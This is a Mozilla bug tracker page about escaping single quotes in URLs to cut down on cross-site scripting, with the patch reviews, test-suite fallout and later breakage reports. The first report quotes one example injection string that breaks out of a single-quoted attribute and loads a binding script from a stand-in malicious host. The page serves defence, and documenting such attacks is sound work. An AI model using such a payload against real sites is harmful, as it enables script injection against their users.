Closed
Bug 376844
Opened 17 years ago
Closed 17 years ago
Single quotes in URLs should be escaped
Categories
(Core :: Networking, defect)
Core
Networking
Tracking
()
RESOLVED
FIXED
People
(Reporter: jwkbugzilla, Assigned: jwkbugzilla)
References
Details
Attachments
(2 files, 1 obsolete file)
1.47 KB,
patch
|
benjamin
:
review+
Biesinger
:
superreview+
|
Details | Diff | Splinter Review |
1.13 KB,
patch
|
Biesinger
:
review+
|
Details | Diff | Splinter Review |
The current escape matrix goes back to bug 108575 and allows single quote character to stay unescaped in URLs. I propose to revert this change and always escape it as %27. This is not consistent with RFC2396 but I cannot think of any case where it will break something. The advantage: it will significantly reduce the number of exploitable XSS vulnerabilities. Typical scenario: a web page uses REQUEST_URI in some attribute, e.g. form action. If the attribute value is enclosed in double quotes, escaping makes it impossible to break out of the attribute. If it uses single quotes however (very common) the attacker might inject the string |'style='-moz-binding:url(http://malicious.xbl.script/)| - Gecko will not escape single quotes and will not prevent this attack. Recent example: http://www.buayacorp.com/files/wordpress/wordpress-advisory.txt You have the same problem with JavaScript, single quotes seem to be used for string literals even more often than double quotes. If the web page puts some URL parameter without proper encoding in such a string literal it might break out and inject JavaScript code.
Attachment #260952 -
Flags: superreview?(darin.moz)
Attachment #260952 -
Flags: review?(dougt)
Assignee | ||
Updated•17 years ago
|
Assignee: nobody → trev
Assignee | ||
Updated•17 years ago
|
Status: NEW → ASSIGNED
Updated•17 years ago
|
Attachment #260952 -
Flags: superreview?(darin.moz) → superreview?(cbiesinger)
Comment 1•17 years ago
|
||
Comment on attachment 260952 [details] [diff] [review] Patch (checked in) a unit test would be nice
Attachment #260952 -
Flags: superreview?(cbiesinger) → superreview+
Assignee | ||
Comment 2•17 years ago
|
||
Attachment #261015 -
Flags: review?(cbiesinger)
Assignee | ||
Comment 3•17 years ago
|
||
There is a problem - this behavior isn't consistent with encodeURIComponent() JavaScript function any more and causes for example test_default_index_handler.js (httpserver unit test) to fail. JavaScript has its own list of characters that shouldn't be escaped in js_uriUnescaped_ucstr variable (jsstr.c). The proper solution should be to remove single quotes from this list as well but this wouldn't conform the ECMA-262 spec. What should we do with it?
Updated•17 years ago
|
Attachment #261015 -
Flags: review?(cbiesinger) → review+
Comment 4•17 years ago
|
||
hm... would it help to make that test use nsINetUtil::escapeString?
Assignee | ||
Comment 5•17 years ago
|
||
Changes the unit test for HTTP server to use nsINetUtil so it is no longer affected by this URL encoding change.
Attachment #261026 -
Flags: review?(sayrer)
Assignee | ||
Updated•17 years ago
|
Attachment #261026 -
Flags: review?(sayrer) → review?(jwalden+bmo)
Comment 6•17 years ago
|
||
Comment on attachment 261026 [details] [diff] [review] Patch for the httpserver unit test Does this change match the semantics at the following location? I'm not entirely sure, and ideally we should keep the code at the two locations reasonably synced to make verifying correctness easier. http://bonsai.mozilla.org/cvsblame.cgi?file=mozilla/netwerk/test/httpserver/httpd.js&rev=1.4&mark=594-598#589
Assignee | ||
Comment 7•17 years ago
|
||
I discussed this with biesi on IRC already. The conclusion was that the comparison in this unit test isn't between the output of httpd.js and escaped file name but rather result of newURI and escaped file name so that the encoding method in httpd.js shouldn't matter. Which doesn't mean that we cannot take the same change for httpd.js (which will also make this note superfluous).
Comment 8•17 years ago
|
||
Comment on attachment 261026 [details] [diff] [review] Patch for the httpserver unit test (In reply to comment #7) Okay; I've thought about it long enough that this makes sense to me, and yeah, changing the output escaping isn't necessary.
Attachment #261026 -
Flags: review?(jwalden+bmo) → review+
Assignee | ||
Updated•17 years ago
|
Attachment #260952 -
Flags: review?(dougt) → review?(benjamin)
Updated•17 years ago
|
Attachment #260952 -
Flags: review?(benjamin) → review+
Assignee | ||
Updated•17 years ago
|
Whiteboard: [checkin needed]
Updated•17 years ago
|
Attachment #260952 -
Attachment description: Patch → Patch (checked in)
Updated•17 years ago
|
Attachment #261015 -
Attachment description: Unit test → Unit test (checked in)
Comment 9•17 years ago
|
||
I checked in the first two patches. The third patch doesn't apply cleanly, and looks like it may not be needed any more. Wladimir, could you review that and post a new patch if needed? Clearing the checkin-needed status for now.
Whiteboard: [checkin needed]
Assignee | ||
Comment 10•17 years ago
|
||
Comment on attachment 261026 [details] [diff] [review] Patch for the httpserver unit test Looks like Jeff fixed this issue in bug 367214 already.
Attachment #261026 -
Attachment is obsolete: true
Assignee | ||
Updated•17 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 17 years ago
Resolution: --- → FIXED
Updated•17 years ago
|
Flags: in-testsuite+
Comment 11•17 years ago
|
||
(In reply to comment #0) > This is not consistent with RFC2396 but I cannot think of any > case where it will break something. Apparently someone found a case where it breaks something, see bug 407172.
Comment 12•17 years ago
|
||
Yes, this breaks certain MediaWiki installations when people create pages titles with single quotes in them. Unfortunately, my example page is behind a corporate firewall.
Depends on: 434211
Comment 13•12 years ago
|
||
It is heartwarming that Firefox tries to protect web servers from dangerous URLs. Once all other browsers die off, and direct socket programming is banned on earth[*], attackers will have no way to trick a vulnerable web server simply by sending it a crafted URL.
You need to log in
before you can comment on or make changes to this bug.
Description
•